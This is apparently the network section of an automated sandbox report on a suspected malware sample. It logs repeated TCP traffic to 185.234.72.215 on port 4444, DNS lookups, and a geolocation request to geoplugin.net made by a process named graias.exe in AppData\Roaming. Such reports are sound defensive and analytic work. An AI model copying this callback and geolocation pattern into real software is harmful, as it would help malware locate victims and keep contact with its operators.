                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333653927 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333739042 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333748102 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333802938 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333811045 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333846092 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333899021 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333908081 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333916903 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333933115 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333946943 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333978891 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333991051 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.334017992 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.334026098 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.334140062 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.334148884 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.249596119 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.254617929 CET8049724199.232.214.172192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.254661083 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.298437119 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.303275108 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.487894058 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.540798903 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.569680929 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574515104 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574573040 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574583054 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574599028 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574610949 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574621916 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574630976 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574677944 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574704885 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574722052 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574732065 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574742079 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574820995 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574830055 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574839115 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574846983 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574915886 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.304662943 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.309555054 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.489834070 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.651576042 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.909264088 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914241076 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914253950 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914271116 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914279938 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914290905 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914319992 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914330006 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914361000 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914401054 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914460897 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914469004 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914477110 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914514065 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914522886 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914554119 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914561987 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914773941 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.989321947 CET444449733185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.107521057 CET497334444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.259654045 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.264575005 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.437963009 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.511320114 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517227888 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517240047 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517250061 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517282963 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517322063 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517330885 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517371893 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517380953 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517436981 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517445087 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517503977 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517512083 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517522097 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517529964 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517591953 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517601013 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517644882 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517689943 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517723083 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517765045 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517896891 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.711834908 CET50095443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.711863041 CET44350095142.250.185.196192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.711957932 CET50095443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.712852955 CET50095443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.712863922 CET44350095142.250.185.196192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.769951105 CET4435005513.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.770005941 CET4435005513.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.770107985 CET50055443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:11.133523941 CET50055443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:11.133544922 CET4435005513.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:11.367448092 CET44350095142.250.185.196192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:11.367665052 CET50095443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:11.367686987 CET44350095142.250.185.196192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:11.368005037 CET44350095142.250.185.196192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:11.368468046 CET50095443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:11.368526936 CET44350095142.250.185.196192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:11.563163042 CET50095443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:11.784476042 CET497334444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:11.785022974 CET4973580192.168.2.4178.237.33.50
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:11.785109043 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:11.785366058 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:21.265772104 CET44350095142.250.185.196192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:21.265841007 CET44350095142.250.185.196192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:21.265991926 CET50095443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:23.095864058 CET50095443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:23.095875025 CET44350095142.250.185.196192.168.2.4

                                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:02.524585962 CET5804753192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:02.531586885 CET53580471.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:06.423626900 CET53571971.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:06.828476906 CET53599031.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:07.829596996 CET53500291.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:09.774959087 CET5145453192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:09.775155067 CET6355753192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.661782980 CET5699753192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.661973000 CET5637653192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.668348074 CET53569971.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.668957949 CET53563761.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.807359934 CET6142753192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.807563066 CET5073453192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:15.271979094 CET53587031.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:16.023082018 CET5041953192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:16.023247004 CET5730353192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:20.336659908 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:25.107408047 CET53559491.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:44.175673008 CET53546411.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:05.850291967 CET53630281.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.092926979 CET53558631.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:16.027097940 CET5197653192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:16.027177095 CET6260953192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:37.211400032 CET53536251.1.1.1192.168.2.4

                                                                                                                                                                                                                                          ICMP Packets

                                                                                                                                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:07.516011000 CET192.168.2.41.1.1.1c2e3(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:09.887711048 CET192.168.2.41.1.1.1c2b4(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.841929913 CET192.168.2.41.1.1.1c2e3(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:11.509022951 CET192.168.2.41.1.1.1c2e3(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:02.524585962 CET192.168.2.41.1.1.10x2a3fStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:09.774959087 CET192.168.2.41.1.1.10x9791Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:09.775155067 CET192.168.2.41.1.1.10x8abStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.661782980 CET192.168.2.41.1.1.10x4713Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.661973000 CET192.168.2.41.1.1.10xc28cStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.807359934 CET192.168.2.41.1.1.10x286Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.807563066 CET192.168.2.41.1.1.10xb2afStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:16.023082018 CET192.168.2.41.1.1.10xf8adStandard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:16.023247004 CET192.168.2.41.1.1.10x9dcfStandard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:16.027097940 CET192.168.2.41.1.1.10x2007Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:16.027177095 CET192.168.2.41.1.1.10x69acStandard query (0)mdec.nelreports.net65IN (0x0001)false

                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:02.531586885 CET1.1.1.1192.168.2.40x2a3fNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:09.781842947 CET1.1.1.1192.168.2.40xca57No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:09.781842947 CET1.1.1.1192.168.2.40xca57No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:09.781842947 CET1.1.1.1192.168.2.40xca57No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:09.782346010 CET1.1.1.1192.168.2.40x8abNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:09.782346010 CET1.1.1.1192.168.2.40x8abNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:09.782888889 CET1.1.1.1192.168.2.40x9791No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:09.782888889 CET1.1.1.1192.168.2.40x9791No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:09.782888889 CET1.1.1.1192.168.2.40x9791No error (0)shed.dual-low.s-part-0039.t-0009.t-msedge.nets-part-0039.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:09.782888889 CET1.1.1.1192.168.2.40x9791No error (0)s-part-0039.t-0009.t-msedge.net13.107.246.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:09.887655020 CET1.1.1.1192.168.2.40x5b5bNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.668348074 CET1.1.1.1192.168.2.40x4713No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.668957949 CET1.1.1.1192.168.2.40xc28cNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.808276892 CET1.1.1.1192.168.2.40x2c77No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.808276892 CET1.1.1.1192.168.2.40x2c77No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.808276892 CET1.1.1.1192.168.2.40x2c77No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.808479071 CET1.1.1.1192.168.2.40x7bc3No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.814021111 CET1.1.1.1192.168.2.40x286No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.814021111 CET1.1.1.1192.168.2.40x286No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.814021111 CET1.1.1.1192.168.2.40x286No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.814021111 CET1.1.1.1192.168.2.40x286No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.814847946 CET1.1.1.1192.168.2.40xb2afNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.814847946 CET1.1.1.1192.168.2.40xb2afNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:16.031270981 CET1.1.1.1192.168.2.40x9dcfNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:16.031327963 CET1.1.1.1192.168.2.40xf8adNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:17.595170021 CET1.1.1.1192.168.2.40x6892No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:17.597938061 CET1.1.1.1192.168.2.40x6bc5No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:20.690104008 CET1.1.1.1192.168.2.40xf9e5No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:20.705367088 CET1.1.1.1192.168.2.40xbc6bNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:56.725841045 CET1.1.1.1192.168.2.40xe39No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:56.725841045 CET1.1.1.1192.168.2.40xe39No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:16.035183907 CET1.1.1.1192.168.2.40x2007No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:16.038311005 CET1.1.1.1192.168.2.40x69acNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:20.184211016 CET1.1.1.1192.168.2.40xf4d9No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:20.184211016 CET1.1.1.1192.168.2.40xf4d9No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:52.321527958 CET1.1.1.1192.168.2.40x6f0fNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:52.321527958 CET1.1.1.1192.168.2.40x6f0fNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                          • https:
                                                                                                                                                                                                                                            • js.monitor.azure.com
                                                                                                                                                                                                                                          • geoplugin.net

                                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          0192.168.2.449735178.237.33.50807188C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:02.551342964 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                                                          Host: geoplugin.net
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:03.166555882 CET1171INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          date: Fri, 03 Jan 2025 23:02:03 GMT
                                                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                                                          content-length: 963
                                                                                                                                                                                                                                          content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                          cache-control: public, max-age=300
                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
